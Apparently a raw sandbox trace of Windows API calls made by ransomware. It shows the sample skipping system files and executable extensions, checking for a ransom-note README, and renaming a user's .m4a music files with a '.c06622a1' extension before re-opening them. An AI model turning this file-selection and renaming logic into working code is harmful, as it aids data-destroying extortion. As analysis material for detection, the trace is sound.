[0150.707] wcslen (_String="ldf") returned 0x3 [0150.707] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.707] wcslen (_String="lnk") returned 0x3 [0150.707] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.707] wcslen (_String="mod") returned 0x3 [0150.707] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.707] wcslen (_String="mpa") returned 0x3 [0150.707] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.708] wcslen (_String="msc") returned 0x3 [0150.708] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.708] wcslen (_String="msp") returned 0x3 [0150.708] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.708] wcslen (_String="msstyles") returned 0x8 [0150.708] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.708] wcslen (_String="msu") returned 0x3 [0150.708] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.708] wcslen (_String="nls") returned 0x3 [0150.708] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.708] wcslen (_String="nomedia") returned 0x7 [0150.708] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.708] wcslen (_String="ocx") returned 0x3 [0150.708] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.708] wcslen (_String="prf") returned 0x3 [0150.708] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.708] wcslen (_String="ps1") returned 0x3 [0150.708] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.708] wcslen (_String="rom") returned 0x3 [0150.708] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.708] wcslen (_String="rtp") returned 0x3 [0150.708] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.708] wcslen (_String="scr") returned 0x3 [0150.708] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.708] wcslen (_String="shs") returned 0x3 [0150.708] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.708] wcslen (_String="spl") returned 0x3 [0150.708] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.708] wcslen (_String="sys") returned 0x3 [0150.708] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.708] wcslen (_String="theme") returned 0x5 [0150.708] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.708] wcslen (_String="themepack") returned 0x9 [0150.708] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.708] wcslen (_String="wpx") returned 0x3 [0150.708] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.708] wcslen (_String="lock") returned 0x4 [0150.709] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.709] wcslen (_String="key") returned 0x3 [0150.709] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.709] wcslen (_String="hta") returned 0x3 [0150.709] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.709] wcslen (_String="msi") returned 0x3 [0150.709] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.709] wcslen (_String="pdb") returned 0x3 [0150.709] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.709] wcslen (_String="sql") returned 0x3 [0150.709] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.709] wcslen (_String="sqlite") returned 0x6 [0150.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.709] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45c00f0 [0150.709] wcscpy (in: _Dest=0x45c00f0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.709] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned 0x71 [0150.709] wcscpy (in: _Dest=0x45c01d4, _Source="piZ3fb2N-l-_YFHpWOlt.m4a" | out: _Dest="piZ3fb2N-l-_YFHpWOlt.m4a") returned="piZ3fb2N-l-_YFHpWOlt.m4a" [0150.709] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a", dwFileAttributes=0x80) returned 1 [0150.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\piz3fb2n-l-_yfhpwolt.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0150.709] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.710] ReadFile (in: hFile=0x648, lpBuffer=0x3fdef4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fdf84, lpOverlapped=0x0 | out: lpBuffer=0x3fdef4*, lpNumberOfBytesRead=0x3fdf84*=0x90, lpOverlapped=0x0) returned 1 [0150.711] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fdef4, Length=0x80) returned 0x5855697f [0150.711] RtlComputeCrc32 (PartialCrc=0x697f, Buffer=0x3fdef4, Length=0x80) returned 0x1e327c41 [0150.711] RtlComputeCrc32 (PartialCrc=0x7c41, Buffer=0x3fdef4, Length=0x80) returned 0x8300a84 [0150.711] RtlComputeCrc32 (PartialCrc=0xa84, Buffer=0x3fdef4, Length=0x80) returned 0x3737a908 [0150.711] RtlComputeCrc32 (PartialCrc=0xa908, Buffer=0x3fdef4, Length=0x80) returned 0x47e36b3f [0150.711] CloseHandle (hObject=0x648) returned 1 [0150.711] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45d00f8 [0150.711] wcscpy (in: _Dest=0x45d00f8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a" [0150.711] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a") returned 0x8a [0150.711] wcscpy (in: _Dest=0x45d020c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.711] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\piz3fb2n-l-_yfhpwolt.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\piz3fb2n-l-_yfhpwolt.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\piZ3fb2N-l-_YFHpWOlt.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\piz3fb2n-l-_yfhpwolt.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0150.713] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.713] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a080671 [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb1a2d83 [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23cc4857 [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xad7bd4b [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a1bbc2d [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a7302be [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4131380f [0150.718] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23ce7baf [0150.721] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0xa3d7300d [0150.721] RtlComputeCrc32 (PartialCrc=0x300d, Buffer=0x48b0094, Length=0x80) returned 0x3b2ade1d [0150.721] RtlComputeCrc32 (PartialCrc=0xde1d, Buffer=0x48b0094, Length=0x80) returned 0xdf5294df [0150.721] RtlComputeCrc32 (PartialCrc=0x94df, Buffer=0x48b0094, Length=0x80) returned 0xc311c409 [0150.721] RtlComputeCrc32 (PartialCrc=0xc409, Buffer=0x48b0094, Length=0x80) returned 0x60bab16 [0150.721] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0150.722] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45c00f0) returned 1 [0150.722] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45d00f8) returned 1 [0150.722] FindNextFileW (in: hFindFile=0x2db8880, lpFindFileData=0x3fe06c | out: lpFindFileData=0x3fe06c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1777c40, ftCreationTime.dwHighDateTime=0x1d5e4b9, ftLastAccessTime.dwLowDateTime=0x197db1e0, ftLastAccessTime.dwHighDateTime=0x1d5d9df, ftLastWriteTime.dwLowDateTime=0x197db1e0, ftLastWriteTime.dwHighDateTime=0x1d5d9df, nFileSizeHigh=0x0, nFileSizeLow=0x1456e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Q1lQSg kwY2aNZCqpV_T.m4a", cAlternateFileName="Q1LQSG~1.M4A")) returned 1 [0150.722] _wcsicmp (_Str1="Q1lQSg kwY2aNZCqpV_T.m4a", _Str2="README.c06622a1.TXT") returned -1 [0150.722] wcsstr (_Str="Q1lQSg kwY2aNZCqpV_T.m4a", _SubStr="README") returned 0x0 [0150.722] _wcsicmp (_Str1="autorun.inf", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -16 [0150.722] wcslen (_String="autorun.inf") returned 0xb [0150.722] _wcsicmp (_Str1="boot.ini", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -15 [0150.722] wcslen (_String="boot.ini") returned 0x8 [0150.722] _wcsicmp (_Str1="bootfont.bin", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -15 [0150.722] wcslen (_String="bootfont.bin") returned 0xc [0150.722] _wcsicmp (_Str1="bootsect.bak", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -15 [0150.722] wcslen (_String="bootsect.bak") returned 0xc [0150.722] _wcsicmp (_Str1="desktop.ini", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -13 [0150.722] wcslen (_String="desktop.ini") returned 0xb [0150.722] _wcsicmp (_Str1="iconcache.db", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -8 [0150.722] wcslen (_String="iconcache.db") returned 0xc [0150.722] _wcsicmp (_Str1="ntldr", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -3 [0150.722] wcslen (_String="ntldr") returned 0x5 [0150.722] _wcsicmp (_Str1="ntuser.dat", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -3 [0150.722] wcslen (_String="ntuser.dat") returned 0xa [0150.722] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -3 [0150.722] wcslen (_String="ntuser.dat.log") returned 0xe [0150.722] _wcsicmp (_Str1="ntuser.ini", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned -3 [0150.722] wcslen (_String="ntuser.ini") returned 0xa [0150.722] _wcsicmp (_Str1="thumbs.db", _Str2="Q1lQSg kwY2aNZCqpV_T.m4a") returned 3 [0150.722] wcslen (_String="thumbs.db") returned 0x9 [0150.722] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.722] wcslen (_String="386") returned 0x3 [0150.722] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.722] wcslen (_String="adv") returned 0x3 [0150.722] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.722] wcslen (_String="ani") returned 0x3 [0150.722] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.723] wcslen (_String="bat") returned 0x3 [0150.723] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.723] wcslen (_String="bin") returned 0x3 [0150.723] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.723] wcslen (_String="cab") returned 0x3 [0150.723] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.723] wcslen (_String="cmd") returned 0x3 [0150.723] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.723] wcslen (_String="com") returned 0x3 [0150.723] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.723] wcslen (_String="cpl") returned 0x3 [0150.723] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.723] wcslen (_String="cur") returned 0x3 [0150.723] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.723] wcslen (_String="deskthemepack") returned 0xd [0150.723] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.723] wcslen (_String="diagcab") returned 0x7 [0150.723] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0150.723] wcslen (_String="diagcfg") returned 0x7 [0150.723] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0150.723] wcslen (_String="diagpkg") returned 0x7 [0150.723] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0150.723] wcslen (_String="dll") returned 0x3 [0150.723] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0150.723] wcslen (_String="drv") returned 0x3 [0150.723] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0150.723] wcslen (_String="exe") returned 0x3 [0150.723] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.723] wcslen (_String="hlp") returned 0x3 [0150.723] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.723] wcslen (_String="icl") returned 0x3 [0150.723] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.723] wcslen (_String="icns") returned 0x4 [0150.723] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.723] wcslen (_String="ico") returned 0x3 [0150.723] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.723] wcslen (_String="ics") returned 0x3 [0150.723] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.724] wcslen (_String="idx") returned 0x3 [0150.724] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.724] wcslen (_String="ldf") returned 0x3 [0150.724] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.724] wcslen (_String="lnk") returned 0x3 [0150.724] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.724] wcslen (_String="mod") returned 0x3 [0150.724] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.724] wcslen (_String="mpa") returned 0x3 [0150.724] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.724] wcslen (_String="msc") returned 0x3 [0150.724] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.724] wcslen (_String="msp") returned 0x3 [0150.724] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.724] wcslen (_String="msstyles") returned 0x8 [0150.724] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.724] wcslen (_String="msu") returned 0x3 [0150.724] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.724] wcslen (_String="nls") returned 0x3 [0150.724] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.724] wcslen (_String="nomedia") returned 0x7 [0150.724] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.724] wcslen (_String="ocx") returned 0x3 [0150.724] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.724] wcslen (_String="prf") returned 0x3 [0150.724] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.724] wcslen (_String="ps1") returned 0x3 [0150.724] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.724] wcslen (_String="rom") returned 0x3 [0150.724] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.724] wcslen (_String="rtp") returned 0x3 [0150.724] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.724] wcslen (_String="scr") returned 0x3 [0150.724] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.724] wcslen (_String="shs") returned 0x3 [0150.724] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.724] wcslen (_String="spl") returned 0x3 [0150.725] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.725] wcslen (_String="sys") returned 0x3 [0150.725] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.725] wcslen (_String="theme") returned 0x5 [0150.725] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.725] wcslen (_String="themepack") returned 0x9 [0150.725] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.725] wcslen (_String="wpx") returned 0x3 [0150.725] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.725] wcslen (_String="lock") returned 0x4 [0150.725] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.725] wcslen (_String="key") returned 0x3 [0150.725] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.725] wcslen (_String="hta") returned 0x3 [0150.725] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.725] wcslen (_String="msi") returned 0x3 [0150.725] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.725] wcslen (_String="pdb") returned 0x3 [0150.725] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.725] wcslen (_String="sql") returned 0x3 [0150.725] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.725] wcslen (_String="sqlite") returned 0x6 [0150.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn")) returned 0x10 [0150.725] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45c00f0 [0150.725] wcscpy (in: _Dest=0x45c00f0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn" [0150.725] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn") returned 0x71 [0150.725] wcscpy (in: _Dest=0x45c01d4, _Source="Q1lQSg kwY2aNZCqpV_T.m4a" | out: _Dest="Q1lQSg kwY2aNZCqpV_T.m4a") returned="Q1lQSg kwY2aNZCqpV_T.m4a" [0150.725] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a", dwFileAttributes=0x80) returned 1 [0150.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\q1lqsg kwy2anzcqpv_t.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0150.726] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.726] ReadFile (in: hFile=0x134, lpBuffer=0x3fdef4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fdf84, lpOverlapped=0x0 | out: lpBuffer=0x3fdef4*, lpNumberOfBytesRead=0x3fdf84*=0x90, lpOverlapped=0x0) returned 1 [0150.727] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fdef4, Length=0x80) returned 0xd6c033f8 [0150.727] RtlComputeCrc32 (PartialCrc=0x33f8, Buffer=0x3fdef4, Length=0x80) returned 0xbc33de38 [0150.727] RtlComputeCrc32 (PartialCrc=0xde38, Buffer=0x3fdef4, Length=0x80) returned 0xddaa4db8 [0150.727] RtlComputeCrc32 (PartialCrc=0x4db8, Buffer=0x3fdef4, Length=0x80) returned 0xa6ec467d [0150.727] RtlComputeCrc32 (PartialCrc=0x467d, Buffer=0x3fdef4, Length=0x80) returned 0xe12e518c [0150.727] CloseHandle (hObject=0x134) returned 1 [0150.727] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45d00f8 [0150.727] wcscpy (in: _Dest=0x45d00f8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a" [0150.727] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a") returned 0x8a [0150.727] wcscpy (in: _Dest=0x45d020c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.727] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\q1lqsg kwy2anzcqpv_t.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\q1lqsg kwy2anzcqpv_t.m4a.c06622a1"), dwFlags=0x8) returned 1 [0150.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\sp6AE4NZCo52aGrKxD\\fV7b28tZTM YqY0S\\JZVBOKxj2eLEEdPiA\\kNf4JZn\\Q1lQSg kwY2aNZCqpV_T.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\sp6ae4nzco52agrkxd\\fv7b28tztm yqy0s\\jzvbokxj2eleedpia\\knf4jzn\\q1lqsg kwy2anzcqpv_t.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0150.738] CreateIoCompletionPort (FileHandle=0x134, 